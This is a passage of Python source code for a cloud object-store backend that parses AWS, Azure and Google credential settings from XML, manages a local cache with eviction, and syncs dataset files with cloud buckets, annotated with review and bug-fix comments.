    # result of signing API calls to cloud provider (e.g., GCP) using
    # incorrect, invalid, or unauthorized credentials.
    return connection
@classmethod
def parse_xml(clazz, config_xml):
    """Parse an ObjectStore XML description into a config dict.

    Common cloud-storage settings are parsed with the S3 helper; the
    provider-specific ``auth`` section is then overwritten below.

    :raises Exception: when the provider attribute or a required
        provider-specific credential is missing.
    """
    config = parse_config_xml(config_xml)
    try:
        provider = config_xml.attrib.get("provider")
        if provider is None:
            msg = "Missing `provider` attribute from the Cloud backend of the ObjectStore."
            log.error(msg)
            raise Exception(msg)
        provider = provider.lower()
        config["provider"] = provider

        # Read any provider-specific configuration.
        auth_element = config_xml.findall("auth")[0]
        missing_config = []
        if provider == "aws":
            akey = auth_element.get("access_key")
            if akey is None:
                missing_config.append("access_key")
            skey = auth_element.get("secret_key")
            if skey is None:
                missing_config.append("secret_key")
            config["auth"] = {
                "access_key": akey,
                "secret_key": skey}
        elif provider == "azure":
            sid = auth_element.get("subscription_id")
            if sid is None:
                missing_config.append("subscription_id")
            cid = auth_element.get("client_id")
            if cid is None:
                missing_config.append("client_id")
            sec = auth_element.get("secret")
            if sec is None:
                missing_config.append("secret")
            ten = auth_element.get("tenant")
            if ten is None:
                missing_config.append("tenant")
            config["auth"] = {
                "subscription_id": sid,
                "client_id": cid,
                "secret": sec,
                "tenant": ten}
        elif provider == "google":
            cre = auth_element.get("credentials_file")
            # Check for a missing attribute BEFORE probing the filesystem:
            # the original called os.path.isfile(None) first, which raises
            # TypeError instead of reporting the missing setting.
            if cre is None:
                missing_config.append("credentials_file")
            elif not os.path.isfile(cre):
                msg = f"The following file specified for GCP credentials not found: {cre}"
                log.error(msg)
                raise OSError(msg)
            config["auth"] = {
                "credentials_file": cre}
        else:
            msg = f"Unsupported provider `{provider}`."
            log.error(msg)
            raise Exception(msg)

        if len(missing_config) > 0:
            msg = "The following configuration required for {} cloud backend " \
                  "are missing: {}".format(provider, missing_config)
            log.error(msg)
            raise Exception(msg)
        else:
            return config
    except Exception:
        log.exception("Malformed ObjectStore Configuration XML -- unable to continue")
        raise
def to_dict(self):
    """Serialize the store: base ObjectStore fields merged with cloud config."""
    return {**super().to_dict(), **self._config_to_dict()}
def __cache_monitor(self):
    """Background loop: evict least-recently-accessed cache files whenever
    total cache usage exceeds 90% of the configured limit."""
    time.sleep(2)  # Wait for things to load before starting the monitor
    # NOTE(review): ``self.running`` is not set anywhere in this class --
    # presumably maintained by the ConcreteObjectStore base; confirm.
    while self.running:
        total_size = 0
        # Is this going to be too expensive of an operation to be done frequently?
        file_list = []
        for dirpath, _, filenames in os.walk(self.staging_path):
            for filename in filenames:
                filepath = os.path.join(dirpath, filename)
                file_size = os.path.getsize(filepath)
                total_size += file_size
                # Get the time given file was last accessed
                # (os.stat(...)[7] is st_atime)
                last_access_time = time.localtime(os.stat(filepath)[7])
                # Compose a tuple of the access time and the file path
                file_tuple = last_access_time, filepath, file_size
                file_list.append(file_tuple)
        # Sort the file list (based on access time)
        file_list.sort()
        # Initiate cleaning once within 10% of the defined cache size?
        cache_limit = self.cache_size * 0.9
        if total_size > cache_limit:
            log.info("Initiating cache cleaning: current cache size: %s; clean until smaller than: %s",
                     convert_bytes(total_size), convert_bytes(cache_limit))
            # How much to delete? If simply deleting up to the cache-10% limit,
            # is likely to be deleting frequently and may run the risk of hitting
            # the limit - maybe delete additional #%?
            # For now, delete enough to leave at least 10% of the total cache free
            delete_this_much = total_size - cache_limit
            self.__clean_cache(file_list, delete_this_much)
        self.sleeper.sleep(30)  # Test cache size every 30 seconds?
def __clean_cache(self, file_list, delete_this_much):
    """ Keep deleting files from the file_list until the size of the deleted
    files is greater than the value in delete_this_much parameter.

    :type file_list: list
    :param file_list: List of candidate files that can be deleted. This method
        will start deleting files from the beginning of the list so the list
        should be sorted accordingly. The list must contains 3-element tuples,
        positioned as follows: position 0 holds file last accessed timestamp
        (as time.struct_time), position 1 holds file path, and position 2 has
        file size (e.g., (<access time>, /mnt/data/dataset_1.dat), 472394)

    :type delete_this_much: int
    :param delete_this_much: Total size of files, in bytes, that should be deleted.
    """
    # Keep deleting datasets from file_list until deleted_amount does not
    # exceed delete_this_much; start deleting from the front of the file list,
    # which assumes the oldest files come first on the list.
    deleted_amount = 0
    # BUG FIX: the original iterated ``enumerate(file_list)``, so entry[1]
    # was the (time, path, size) tuple and entry[2] raised IndexError.
    # Unpack the tuples directly instead.
    for _access_time, file_path, file_size in file_list:
        if deleted_amount < delete_this_much:
            deleted_amount += file_size
            os.remove(file_path)
        else:
            log.debug("Cache cleaning done. Total space freed: %s", convert_bytes(deleted_amount))
            return
def _get_bucket(self, bucket_name):
    """Fetch (creating on demand) and return the named CloudBridge bucket.

    :raises InvalidNameException: when the bucket name is not valid.
    """
    try:
        bucket = self.conn.storage.buckets.get(bucket_name)
        if bucket is None:
            log.debug("Bucket not found, creating a bucket with handle '%s'", bucket_name)
            bucket = self.conn.storage.buckets.create(bucket_name)
        log.debug("Using cloud ObjectStore with bucket '%s'", bucket.name)
        return bucket
    except InvalidNameException:
        log.exception("Invalid bucket name -- unable to continue")
        raise
    except Exception:
        # These two generic exceptions will be replaced by specific exceptions
        # once proper exceptions are exposed by CloudBridge.
        log.exception(f"Could not get bucket '{bucket_name}'")
        # Re-raise the original error: ``raise Exception`` discarded both
        # the message and the causing traceback.
        raise
def _fix_permissions(self, rel_path):
    """Normalize permissions (via the configured umask/gid) under rel_path."""
    for basedir, _dirs, files in os.walk(rel_path):
        umask_fix_perms(basedir, self.config.umask, 0o777, self.config.gid)
        for name in files:
            full_path = os.path.join(basedir, name)
            # Never chmod through a symlink.
            if os.path.islink(full_path):
                continue
            umask_fix_perms(full_path, self.config.umask, 0o666, self.config.gid)
def _construct_path(self, obj, base_dir=None, dir_only=None, extra_dir=None, extra_dir_at_root=False, alt_name=None,
                    obj_dir=False, **kwargs):
    """Build the bucket-relative (or base_dir-relative) path for ``obj``.

    The path is derived from the hashed object id, optionally combined with
    ``extra_dir`` (at the root or the leaf), the object id itself
    (``obj_dir``), and a file name (``alt_name`` or ``dataset_<id>.dat``).
    Directory keys get a trailing '/'.

    :raises ObjectInvalid: if extra_dir or alt_name could escape the store.
    """
    # extra_dir should never be constructed from provided data but just
    # make sure there are no shenannigans afoot
    if extra_dir and extra_dir != os.path.normpath(extra_dir):
        log.warning('extra_dir is not normalized: %s', extra_dir)
        raise ObjectInvalid("The requested object is invalid")
    # ensure that any parent directory references in alt_name would not
    # result in a path not contained in the directory path constructed here
    if alt_name:
        if not safe_relpath(alt_name):
            log.warning('alt_name would locate path outside dir: %s', alt_name)
            raise ObjectInvalid("The requested object is invalid")
        # alt_name can contain parent directory references, but S3 will not
        # follow them, so if they are valid we normalize them out
        alt_name = os.path.normpath(alt_name)
    rel_path = os.path.join(*directory_hash_id(self._get_object_id(obj)))
    if extra_dir is not None:
        if extra_dir_at_root:
            rel_path = os.path.join(extra_dir, rel_path)
        else:
            rel_path = os.path.join(rel_path, extra_dir)
    # for JOB_WORK directory
    if obj_dir:
        rel_path = os.path.join(rel_path, str(self._get_object_id(obj)))
    if base_dir:
        base = self.extra_dirs.get(base_dir)
        # NOTE(review): returns a filesystem path, without the trailing '/'
        # or file-name handling below -- confirm callers expect a directory.
        return os.path.join(base, rel_path)
    # S3 folders are marked by having trailing '/' so add it now
    rel_path = f'{rel_path}/'
    if not dir_only:
        rel_path = os.path.join(rel_path, alt_name if alt_name else f"dataset_{self._get_object_id(obj)}.dat")
    return rel_path
def _get_cache_path(self, rel_path):
    """Absolute filesystem path of rel_path inside the local staging cache."""
    joined = os.path.join(self.staging_path, rel_path)
    return os.path.abspath(joined)
def _get_transfer_progress(self):
    # Counter advanced by _transfer_cb while an upload/download is running.
    return self.transfer_progress
def _get_size_in_cloud(self, rel_path):
    """Size in bytes of the bucket object named rel_path, or -1 when unavailable."""
    try:
        remote = self.bucket.objects.get(rel_path)
        if remote:
            return remote.size
    except Exception:
        log.exception("Could not get size of key '%s' from S3", rel_path)
    # Missing object or lookup failure both report -1.
    return -1
def _key_exists(self, rel_path):
    """Return True when rel_path exists in the bucket.

    A trailing '/' marks a "folder" key, which is probed with a prefix
    listing; anything else is looked up directly.
    """
    exists = False
    try:
        # A hackish way of testing if the rel_path is a folder vs a file
        is_dir = rel_path[-1] == '/'
        if is_dir:
            keyresult = self.bucket.objects.list(prefix=rel_path)
            exists = len(keyresult) > 0
        else:
            exists = self.bucket.objects.get(rel_path) is not None
    except Exception:
        log.exception("Trouble checking existence of S3 key '%s'", rel_path)
        return False
    if rel_path[0] == '/':
        # Absolute paths must never be used as bucket keys.  The original
        # used a bare ``raise`` here with no active exception, which
        # surfaces as an unhelpful RuntimeError; raise explicitly instead.
        raise ObjectInvalid("The requested object is invalid: %s" % rel_path)
    return exists
def _in_cache(self, rel_path):
    """Return True when a cached copy of rel_path exists under the staging path."""
    return os.path.exists(self._get_cache_path(rel_path))
def _pull_into_cache(self, rel_path):
    """Download rel_path from the bucket into the cache; True on success."""
    # Make sure the destination directory chain (e.g. dataset_#_files/)
    # exists before downloading into it.
    cache_dir = self._get_cache_path(os.path.dirname(rel_path))
    if not os.path.exists(cache_dir):
        os.makedirs(cache_dir)
    downloaded = self._download(rel_path)
    self._fix_permissions(cache_dir)
    return downloaded
def _transfer_cb(self, complete, total):
    # Transfer progress callback.  NOTE(review): the complete/total
    # arguments are ignored and the counter simply grows by 10 per call --
    # presumably only a liveness indicator, not a percentage; confirm
    # before displaying it as one.
    self.transfer_progress += 10
def _download(self, rel_path):
    """Fetch rel_path from the bucket into the local cache; True on success."""
    try:
        log.debug("Pulling key '%s' into cache to %s", rel_path, self._get_cache_path(rel_path))
        key = self.bucket.objects.get(rel_path)
        # Test if cache is large enough to hold the new file
        if self.cache_size > 0 and key.size > self.cache_size:
            log.critical("File %s is larger (%s) than the cache size (%s). Cannot download.",
                         rel_path, key.size, self.cache_size)
            return False
        if self.use_axel:
            log.debug("Parallel pulled key '%s' into cache to %s", rel_path, self._get_cache_path(rel_path))
            ncores = multiprocessing.cpu_count()
            url = key.generate_url(7200)
            # BUG FIX: pass an argv list.  The previous single-string form
            # (without shell=True) tried to exec the entire command line as
            # one program name and always failed.
            ret_code = subprocess.call(["axel", "-a", "-n", str(ncores), url])
            if ret_code == 0:
                return True
        else:
            log.debug("Pulled key '%s' into cache to %s", rel_path, self._get_cache_path(rel_path))
            self.transfer_progress = 0  # Reset transfer progress counter
            with open(self._get_cache_path(rel_path), "w+") as downloaded_file_handle:
                # NOTE(review): text mode; if save_content writes bytes this
                # should be "wb+" -- confirm against the cloudbridge API.
                key.save_content(downloaded_file_handle)
            return True
    except Exception:
        log.exception("Problem downloading key '%s' from S3 bucket '%s'", rel_path, self.bucket.name)
    return False
def _push_to_os(self, rel_path, source_file=None, from_string=None):
    """
    Push the file pointed to by ``rel_path`` to the object store naming the key
    ``rel_path``. If ``source_file`` is provided, push that file instead while
    still using ``rel_path`` as the key name.
    If ``from_string`` is provided, set contents of the file to the value of
    the string.

    Returns True on success (including the empty-file skip), False otherwise.
    """
    try:
        source_file = source_file if source_file else self._get_cache_path(rel_path)
        if os.path.exists(source_file):
            # Don't re-push an empty file over an existing key.
            if os.path.getsize(source_file) == 0 and (self.bucket.objects.get(rel_path) is not None):
                log.debug("Wanted to push file '%s' to S3 key '%s' but its size is 0; skipping.", source_file,
                          rel_path)
                return True
            if from_string:
                # BUG FIX: upload the *string* contents.  The original
                # uploaded source_file here, contradicting this branch's
                # purpose and its own log message below.
                if not self.bucket.objects.get(rel_path):
                    created_obj = self.bucket.objects.create(rel_path)
                    created_obj.upload(from_string)
                else:
                    self.bucket.objects.get(rel_path).upload(from_string)
                log.debug("Pushed data from string '%s' to key '%s'", from_string, rel_path)
            else:
                start_time = datetime.now()
                log.debug("Pushing cache file '%s' of size %s bytes to key '%s'", source_file,
                          os.path.getsize(source_file), rel_path)
                self.transfer_progress = 0  # Reset transfer progress counter
                if not self.bucket.objects.get(rel_path):
                    created_obj = self.bucket.objects.create(rel_path)
                    created_obj.upload_from_file(source_file)
                else:
                    self.bucket.objects.get(rel_path).upload_from_file(source_file)
                end_time = datetime.now()
                log.debug("Pushed cache file '%s' to key '%s' (%s bytes transfered in %s sec)",
                          source_file, rel_path, os.path.getsize(source_file), end_time - start_time)
            return True
        else:
            log.error("Tried updating key '%s' from source file '%s', but source file does not exist.",
                      rel_path, source_file)
    except Exception:
        log.exception("Trouble pushing S3 key '%s' from file '%s'", rel_path, source_file)
    return False
def file_ready(self, obj, **kwargs):
    """Return True when the dataset's cached file is fully transferred.

    The cached copy counts as ready only when its size matches the size
    reported by the cloud store.
    """
    rel_path = self._construct_path(obj, **kwargs)
    if not self._in_cache(rel_path):
        return False
    local_size = os.path.getsize(self._get_cache_path(rel_path))
    remote_size = self._get_size_in_cloud(rel_path)
    if local_size == remote_size:
        return True
    log.debug("Waiting for dataset %s to transfer from OS: %s/%s", rel_path,
              local_size, remote_size)
    return False
def _exists(self, obj, **kwargs):
    """Return True when obj exists in the cache or the cloud store.

    Side effect: a dataset found only in the cache is pushed to the cloud
    before returning True; a missing JOB_WORK directory is created.
    """
    in_cache = False
    rel_path = self._construct_path(obj, **kwargs)
    # Check cache
    if self._in_cache(rel_path):
        in_cache = True
    # Check cloud
    in_cloud = self._key_exists(rel_path)
    # log.debug("~~~~~~ File '%s' exists in cache: %s; in s3: %s" % (rel_path, in_cache, in_s3))
    # dir_only does not get synced so shortcut the decision
    dir_only = kwargs.get('dir_only', False)
    base_dir = kwargs.get('base_dir', None)
    if dir_only:
        if in_cache or in_cloud:
            return True
        # for JOB_WORK directory
        elif base_dir:
            if not os.path.exists(rel_path):
                os.makedirs(rel_path)
            return True
        else:
            return False
    # TODO: Sync should probably not be done here. Add this to an async upload stack?
    if in_cache and not in_cloud:
        self._push_to_os(rel_path, source_file=self._get_cache_path(rel_path))
        return True
    elif in_cloud:
        return True
    else:
        return False
def _create(self, obj, **kwargs):
    """Create an empty dataset (or directory) for obj if it does not exist.

    Mirrors the path construction of _construct_path for the cache, then
    pushes an empty key so the object also exists in the cloud store.
    """
    if not self._exists(obj, **kwargs):
        # Pull out locally used fields
        extra_dir = kwargs.get('extra_dir', None)
        extra_dir_at_root = kwargs.get('extra_dir_at_root', False)
        dir_only = kwargs.get('dir_only', False)
        alt_name = kwargs.get('alt_name', None)
        # Construct hashed path
        rel_path = os.path.join(*directory_hash_id(self._get_object_id(obj)))
        # Optionally append extra_dir
        if extra_dir is not None:
            if extra_dir_at_root:
                rel_path = os.path.join(extra_dir, rel_path)
            else:
                rel_path = os.path.join(rel_path, extra_dir)
        # Create given directory in cache
        cache_dir = os.path.join(self.staging_path, rel_path)
        if not os.path.exists(cache_dir):
            os.makedirs(cache_dir)
        if not dir_only:
            # Touch an empty file in the cache, then mirror it to the cloud.
            rel_path = os.path.join(rel_path, alt_name if alt_name else f"dataset_{self._get_object_id(obj)}.dat")
            open(os.path.join(self.staging_path, rel_path), 'w').close()
            self._push_to_os(rel_path, from_string='')
def _empty(self, obj, **kwargs):
    """Return True when the dataset exists and has zero size.

    BUG FIX: the original returned ``size > 0`` -- the *inverse* of
    "empty".

    :raises ObjectNotFound: when the object does not exist at all.
    """
    if self._exists(obj, **kwargs):
        return bool(self._size(obj, **kwargs) == 0)
    raise ObjectNotFound('objectstore.empty, object does not exist: %s, kwargs: %s'
                         % (str(obj), str(kwargs)))
def _size(self, obj, **kwargs):
    """Return obj's size in bytes: from the cache when possible, falling
    back to the cloud copy; 0 when the dataset cannot be found at all."""
    rel_path = self._construct_path(obj, **kwargs)
    if self._in_cache(rel_path):
        try:
            return os.path.getsize(self._get_cache_path(rel_path))
        except OSError as ex:
            log.info("Could not get size of file '%s' in local cache, will try cloud. Error: %s", rel_path, ex)
    # BUG FIX: this was an ``elif``, so after a failed cache stat the cloud
    # was never actually consulted despite the log message above.
    if self._exists(obj, **kwargs):
        return self._get_size_in_cloud(rel_path)
    log.warning("Did not find dataset '%s', returning 0 for size", rel_path)
    return 0
def _delete(self, obj, entire_dir=False, **kwargs):
    """Delete obj from the cache and the cloud store; True on success."""
    rel_path = self._construct_path(obj, **kwargs)
    extra_dir = kwargs.get('extra_dir', None)
    base_dir = kwargs.get('base_dir', None)
    dir_only = kwargs.get('dir_only', False)
    obj_dir = kwargs.get('obj_dir', False)
    try:
        # Remove temporary data in JOB_WORK directory
        if base_dir and dir_only and obj_dir:
            shutil.rmtree(os.path.abspath(rel_path))
            return True
        # For the case of extra_files, because we don't have a reference to
        # individual files/keys we need to remove the entire directory structure
        # with all the files in it. This is easy for the local file system,
        # but requires iterating through each individual key in S3 and deleting it.
        if entire_dir and extra_dir:
            shutil.rmtree(self._get_cache_path(rel_path), ignore_errors=True)
            results = self.bucket.objects.list(prefix=rel_path)
            for key in results:
                log.debug("Deleting key %s", key.name)
                key.delete()
            return True
        else:
            # Delete from cache first
            unlink(self._get_cache_path(rel_path), ignore_errors=True)
            # Delete from S3 as well
            if self._key_exists(rel_path):
                key = self.bucket.objects.get(rel_path)
                log.debug("Deleting key %s", key.name)
                key.delete()
            return True
    # BUG FIX: OSError must be caught before the generic handler -- as a
    # subclass of Exception it was unreachable in the original ordering.
    except OSError:
        log.exception('%s delete error', self._get_filename(obj, **kwargs))
    except Exception:
        log.exception("Could not delete key '%s' from cloud", rel_path)
    return False
def _get_data(self, obj, start=0, count=-1, **kwargs):
    """Read ``count`` characters (default: the rest) of obj starting at ``start``.

    The file is pulled into the local cache first on a cache miss.
    """
    rel_path = self._construct_path(obj, **kwargs)
    if not self._in_cache(rel_path):
        self._pull_into_cache(rel_path)
    # Serve the requested slice from the cached copy.
    with open(self._get_cache_path(rel_path)) as data_file:
        data_file.seek(start)
        return data_file.read(count)
def _get_filename(self, obj, **kwargs):
    """Return a local filesystem path for obj, pulling it into cache if needed.

    :raises ObjectNotFound: when the object is in neither cache nor cloud.
    """
    base_dir = kwargs.get('base_dir', None)
    dir_only = kwargs.get('dir_only', False)
    obj_dir = kwargs.get('obj_dir', False)
    rel_path = self._construct_path(obj, **kwargs)
    # for JOB_WORK directory
    if base_dir and dir_only and obj_dir:
        return os.path.abspath(rel_path)
    cache_path = self._get_cache_path(rel_path)
    # S3 does not recognize directories as files so cannot check if those exist.
    # So, if checking dir only, ensure given dir exists in cache and return
    # the expected cache path.
    # dir_only = kwargs.get('dir_only', False)
    # if dir_only:
    #     if not os.path.exists(cache_path):
    #         os.makedirs(cache_path)
    #     return cache_path
    # Check if the file exists in the cache first
    if self._in_cache(rel_path):
        return cache_path
    # Check if the file exists in persistent storage and, if it does, pull it into cache
    elif self._exists(obj, **kwargs):
        if dir_only:  # Directories do not get pulled into cache
            return cache_path
        else:
            if self._pull_into_cache(rel_path):
                return cache_path
    # For the case of retrieving a directory only, return the expected path
    # even if it does not exist.
    # if dir_only:
    #     return cache_path
    raise ObjectNotFound('objectstore.get_filename, no cache_path: %s, kwargs: %s'
                         % (str(obj), str(kwargs)))
    # return cache_path # Until the upload tool does not explicitly create the dataset, return expected path
def _update_from_file(self, obj, file_name=None, create=False, **kwargs):
    """Copy file_name (or the cached copy) over obj and push it to the cloud.

    :param create: when True, create the object first if it is missing.
    :raises ObjectNotFound: when the object does not exist (and create=False).
    """
    if create:
        self._create(obj, **kwargs)
    if self._exists(obj, **kwargs):
        rel_path = self._construct_path(obj, **kwargs)
        # Chose whether to use the dataset file itself or an alternate file
        if file_name:
            source_file = os.path.abspath(file_name)
            # Copy into cache
            cache_file = self._get_cache_path(rel_path)
            try:
                if source_file != cache_file:
                    # FIXME? Should this be a `move`?
                    shutil.copy2(source_file, cache_file)
                self._fix_permissions(cache_file)
            except OSError:
                log.exception("Trouble copying source file '%s' to cache '%s'", source_file, cache_file)
        else:
            source_file = self._get_cache_path(rel_path)
        # Update the file on cloud
        self._push_to_os(rel_path, source_file)
    else:
        raise ObjectNotFound('objectstore.update_from_file, object does not exist: %s, kwargs: %s'
                             % (str(obj), str(kwargs)))
def _get_object_url(self, obj, **kwargs):
    """Return a pre-signed URL (24 h expiry) for obj, or None when unavailable."""
    if not self._exists(obj, **kwargs):
        return None
    rel_path = self._construct_path(obj, **kwargs)
    try:
        key = self.bucket.objects.get(rel_path)
        return key.generate_url(expires_in=86400)  # 24hrs
    except Exception:
        log.exception("Trouble generating URL for dataset '%s'", rel_path)
        return None
def _get_store_usage_percent(self):
    # Usage reporting is not meaningful for an elastic cloud bucket, so
    # always report 0% used.
    return 0.0
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.